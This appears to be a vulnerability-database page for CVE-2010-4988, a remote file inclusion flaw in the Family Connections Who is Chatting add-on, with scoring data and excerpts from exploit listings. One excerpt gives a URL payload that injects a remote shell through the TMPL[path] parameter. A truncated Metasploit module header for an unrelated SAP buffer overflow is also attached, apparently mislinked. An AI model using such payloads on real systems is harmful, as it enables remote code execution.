CVE-2010-4988
published 2011-11-01CVE-2010-4988: PHP remote file inclusion vulnerability in mod_chatting/themes/default/header.php in Family Connections Who is Chatting 2.2.3 allows remote attackers to…
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.41%
82.1th percentile
PHP remote file inclusion vulnerability in mod_chatting/themes/default/header.php in Family Connections Who is Chatting 2.2.3 allows remote attackers to execute arbitrary PHP code via a URL in the TMPL[path] parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| familycms | family_connections_who_is_chatting | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-11-30
CVE-2009-4988 SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: sap_2005_license.rb 11180 2010-11-30 20:19:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SAP Business One License Manager 2005 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the SAP Business One 2005
License Manager 'NT Naming Service' A and B releases. By sending an
excessively long string the stack is overwritten enabling arbitrary
code execution.
},
'Author' => 'Jacopo Cervini',
'Version' => '$Re
Exploit-DB
Family Connections Who is Chatting AddOn - Remote File Inclusion
exploitdb·2010-07-03
CVE-2010-4988 Family Connections Who is Chatting AddOn - Remote File Inclusion
Family Connections Who is Chatting AddOn - Remote File Inclusion
---
Who is Chatting 2.2.3 Remote File Include Vulnerability
# Author : lumut--
# Script Details : http://www.familycms.com/downloads/details.php?file=50
# Bugs :
# Expl: http://server/mod_chatting/themes/default/header.php?TMPL[path]=[shell]
# Greetz & Thanks: cr4wl3r, team_elite, kisame, virusfree, doniskynet,
manadocoding*
No writeups or analysis indexed.
http://www.exploit-db.com/exploits/14186http://www.securityfocus.com/bid/41346http://www.vupen.com/english/advisories/2010/1687https://exchange.xforce.ibmcloud.com/vulnerabilities/60057http://www.exploit-db.com/exploits/14186http://www.securityfocus.com/bid/41346http://www.vupen.com/english/advisories/2010/1687https://exchange.xforce.ibmcloud.com/vulnerabilities/60057
2011-11-01
Published